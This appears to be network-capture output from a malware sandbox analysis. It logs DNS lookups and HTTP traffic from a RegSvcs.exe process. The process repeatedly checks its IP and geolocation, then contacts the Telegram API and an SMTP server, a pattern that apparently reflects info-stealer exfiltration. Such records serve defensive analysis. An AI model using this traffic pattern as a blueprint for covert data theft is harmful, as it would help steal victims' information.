                                                                              Oct 9, 2024 14:45:26.496593952 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.496649981 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.497354031 CEST8049726193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:26.497407913 CEST4972680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:26.501930952 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:27.128807068 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:27.129280090 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:27.130101919 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.130143881 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.130220890 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.130624056 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.130639076 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.134676933 CEST8049731193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:27.134741068 CEST4973180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:27.590748072 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.599278927 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.599294901 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.724653959 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.724756002 CEST44349733188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:27.724837065 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.750072956 CEST49733443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:27.939248085 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:27.939274073 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:27.939409971 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:27.947683096 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:27.947695971 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.569412947 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.569504023 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.573570967 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.573577881 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.573832989 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.582921982 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.627402067 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.818815947 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.818881989 CEST44349735149.154.167.220192.168.2.12
                                                                              Oct 9, 2024 14:45:29.818994999 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:29.832639933 CEST49735443192.168.2.12149.154.167.220
                                                                              Oct 9, 2024 14:45:35.641568899 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:35.646461964 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:35.646549940 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:36.786866903 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:36.787121058 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:36.793821096 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.050111055 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.050338984 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.055672884 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.352309942 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.352874994 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.357846022 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.629070997 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.629621029 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.629710913 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.631726027 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.638169050 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.898633957 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:37.921444893 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:37.926356077 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.328382015 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.329159021 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:38.333893061 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.592576027 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.592941046 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:38.598397017 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.869231939 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:38.869649887 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:38.874509096 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.132128000 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.132411957 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.137192011 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.658699989 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.658951998 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.667295933 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.992367983 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.993417025 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.993488073 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.993519068 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.993542910 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:39.998348951 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.998366117 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.998380899 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:39.998466969 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:40.440579891 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:40.488428116 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:41.943928957 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:41.948906898 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:42.626591921 CEST5874973646.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:42.627096891 CEST49736587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:42.628124952 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:42.634257078 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:42.634356976 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:43.868622065 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:43.868843079 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:43.874509096 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.140444994 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.140820980 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.145742893 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.415576935 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.416224957 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.421142101 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704081059 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704107046 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704132080 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.704262972 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.706307888 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.711165905 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.975028038 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:44.978954077 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:44.983795881 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.247931957 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.255012035 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:45.259948969 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.526326895 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.526587009 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:45.531549931 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.810492039 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:45.810739040 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:45.815892935 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.080734968 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.081345081 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.086329937 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.435252905 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.435556889 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.440668106 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.706062078 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.706389904 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.706485033 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.706485033 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.706525087 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:45:46.711787939 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711808920 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711838961 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711852074 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:46.711864948 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:47.153527021 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:45:47.207187891 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:47:22.067414045 CEST49737587192.168.2.1246.151.208.21
                                                                              Oct 9, 2024 14:47:22.265441895 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:47:22.951688051 CEST5874973746.151.208.21192.168.2.12
                                                                              Oct 9, 2024 14:47:22.952564001 CEST49737587192.168.2.1246.151.208.21
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 9, 2024 14:45:13.858566999 CEST | 52385 | 53 | 192.168.2.12 | 1.1.1.1
Oct 9, 2024 14:45:13.867832899 CEST | 53 | 52385 | 1.1.1.1 | 192.168.2.12
Oct 9, 2024 14:45:15.638025999 CEST | 63991 | 53 | 192.168.2.12 | 1.1.1.1
Oct 9, 2024 14:45:15.649276018 CEST | 53 | 63991 | 1.1.1.1 | 192.168.2.12
Oct 9, 2024 14:45:27.915414095 CEST | 55247 | 53 | 192.168.2.12 | 1.1.1.1
Oct 9, 2024 14:45:27.927830935 CEST | 53 | 55247 | 1.1.1.1 | 192.168.2.12
Oct 9, 2024 14:45:35.193994045 CEST | 58049 | 53 | 192.168.2.12 | 1.1.1.1
Oct 9, 2024 14:45:35.640786886 CEST | 53 | 58049 | 1.1.1.1 | 192.168.2.12
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 9, 2024 14:45:13.858566999 CEST | 192.168.2.12 | 1.1.1.1 | 0x9b3b | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:15.638025999 CEST | 192.168.2.12 | 1.1.1.1 | 0x1ca3 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:27.915414095 CEST | 192.168.2.12 | 1.1.1.1 | 0x4cb5 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:35.193994045 CEST | 192.168.2.12 | 1.1.1.1 | 0xcc21 | Standard query (0) | mail.irco.com.sa | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 9, 2024 14:45:13.867832899 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3b | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 9, 2024 14:45:13.867832899 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3b | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:13.867832899 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3b | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:13.867832899 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3b | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:13.867832899 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3b | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:13.867832899 CEST | 1.1.1.1 | 192.168.2.12 | 0x9b3b | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:15.649276018 CEST | 1.1.1.1 | 192.168.2.12 | 0x1ca3 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:15.649276018 CEST | 1.1.1.1 | 192.168.2.12 | 0x1ca3 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:27.927830935 CEST | 1.1.1.1 | 192.168.2.12 | 0x4cb5 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Oct 9, 2024 14:45:35.640786886 CEST | 1.1.1.1 | 192.168.2.12 | 0xcc21 | No error (0) | mail.irco.com.sa | | 46.151.208.21 | A (IP address) | IN (0x0001) | false
                                                                              • reallyfreegeoip.org
                                                                              • api.telegram.org
                                                                              • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49711 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 9, 2024 14:45:13.878197908 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 9, 2024 14:45:15.409717083 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 9, 2024 14:45:15.410913944 CEST320INHTTP/1.1 200 OK
                                                                              Date: Wed, 09 Oct 2024 12:45:14 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 9, 2024 14:45:15.412327051 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:14 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 9, 2024 14:45:15.413544893 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Oct 9, 2024 14:45:15.414058924 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:14 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2d57bca461442d145069b8f4eb2f6ca1
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 9, 2024 14:45:15.602896929 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:15 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: c959a6ea0fa47033c615ec7579b8600f
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 9, 2024 14:45:16.327049017 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Oct 9, 2024 14:45:16.514153957 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:16 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 26d3cbfc4dc7c6545d050669643d01c1
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49714 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:17.160048008 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Oct 9, 2024 14:45:17.787153006 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:17 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 8a62b44ce179146a99294c07a91e4429
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.12 | 49716 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:19.115308046 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 9, 2024 14:45:19.741142988 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:19 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b51af6d77f22a573687fe58e1a7b081c
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.12 | 49718 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:21.421016932 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 9, 2024 14:45:22.046936035 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:21 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 61aeae9b82f9fca8a9e09e496d349936
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.12 | 49721 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:22.691395998 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 9, 2024 14:45:23.316754103 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:23 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2a247d4f0e79bb3911475c7acaccd55c
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.12 | 49723 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:23.980896950 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 9, 2024 14:45:24.627980947 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:24 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: af00b6d9b47dddbde35e5bd1c5361cc5
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.12 | 49726 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:25.260351896 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 9, 2024 14:45:25.887968063 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:25 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 24a4b45fdcc783fb9105b5bf39d959f9
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.12 | 49731 | 193.122.6.168 | 80 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:45:26.496649981 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 9, 2024 14:45:27.128807068 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:27 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ebb5e6e0cc637b1cc37ccd68db2a3983
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49712 | 188.114.96.34 | 443 | 7020 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-09 12:45:16 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-09 12:45:16 UTC | 676 | IN | HTTP/1.1 200 OK
    Date: Wed, 09 Oct 2024 12:45:16 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 35797
    Last-Modified: Wed, 09 Oct 2024 02:48:39 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tr9v6tG63iIS6PH8JYDZ8iBEGmLeAV3gYKikGYFubm3EFy3yZ%2Bnz%2F26T2yhlLq54zfp3W%2BueHlza1LMAr6mDnfAbHbGnCpkNxyOeVBktgQ5GyktmMLutE2CDvPa2K7gCh5fMlI2p"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8cfe778089d0c40c-EWR
